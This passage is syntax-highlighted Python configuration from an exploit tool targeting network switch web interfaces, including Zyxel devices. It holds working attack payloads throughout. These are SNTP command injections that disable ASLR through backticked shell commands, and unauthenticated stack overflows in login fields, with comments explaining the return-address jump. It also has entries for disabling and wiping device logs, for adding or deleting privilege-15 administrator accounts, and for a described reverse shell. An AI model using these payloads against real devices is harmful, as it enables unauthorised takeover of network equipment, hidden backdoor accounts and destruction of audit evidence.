						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_time'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntp=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=sys_time'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_time'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntp=1&amp;srvDef=ipv4&amp;srvHost=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;port=139&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntp=1&amp;srvDef=ipv4&amp;srvHost=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;port=139&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_time'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntp=1&amp;timezone=0&amp;srvDef=ipv4&amp;srvHost=+&amp;port=139&amp;dlsType=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_time'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntp=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>

						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">348</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">308</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>

					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">348</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">308</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;_de=1":{}}'</span><span class="token punctuation">,</span>

						<span class="token comment">#'log_settings_set_cmd':'&amp;logState=1&amp;consoleState=1&amp;ramState=1&amp;fileState=1',	# Enable Logging CMD</span>
						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;empty=1'</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;target=0'</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;target=1'</span><span class="token punctuation">,</span>			<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">348</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">308</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp=1&amp;srvDef=ipv4&amp;srvHost=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;port=139&amp;dlsType=0'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp=1&amp;srvDef=ipv4&amp;srvHost=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;port=139&amp;dlsType=0'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp=1&amp;srvDef=ipv4&amp;srvHost=+&amp;port=139&amp;dlsType=0'</span><span class="token punctuation">,</span>				<span class="token comment"># CMD</span>

						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp=1'</span><span class="token punctuation">,</span>	<span class="token comment"># Enable CMD</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp=0'</span><span class="token punctuation">,</span>	<span class="token comment"># Disable CMD</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token comment">#</span>
					<span class="token comment"># After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.</span>
					<span class="token comment"># Then we will start walk down from top of stack to hit the NOP sled to execute shellcode</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_logout'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=_ALIGN_USRNOP_SHELLCODE&amp;password=_PWDNOP_RA_START&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span> <span class="token comment"># False = use Heap, and there are no ASLR</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'Zyxel'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'Zyxel Communications Corp.'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'encode'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=USERNAME&amp;password=PASSWORD&amp;login=1'</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=547'</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=3'</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'LOGGING_SERVICE=0&amp;cmd=4353'</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=4352'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">'cmd_4364=Clear+file+messages'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">'cmd_4364=Clear+buffered+messages'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'dispatcher.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from heap overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">112</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">60</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;STARTUP_BACKUP=1'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi?XXX'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'clear'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------'</span><span class="token punctuation">,</span>
						<span class="token comment">#'encryption':'nopassword',</span>
						<span class="token comment">#'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" nopassword\n\n------', # Yep, working too</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span> 
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=524&amp;usrName=USERNAME'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_enable=1&amp;cmd=548'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=+&amp;sntp_Port=139&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_enable=0&amp;cmd=548'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>	<span class="token comment"># Not vulnerable </span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">100</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">60</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;STARTUP_BACKUP=1'</span><span class="token punctuation">,</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: del priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">100</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">60</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;STARTUP_BACKUP=1'</span><span class="token punctuation">,</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">100</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">60</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;STARTUP_BACKUP=1'</span><span class="token punctuation">,</span>

						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;LOGGING_SERVICE=0'</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>						<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;_del=0'</span><span class="token punctuation">,</span>	<span class="token comment"># Clean RAM log CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>							<span class="token comment"># Clean RAM log SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;_del=1'</span><span class="token punctuation">,</span>		<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>							<span class="token comment"># Clean FILE log SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
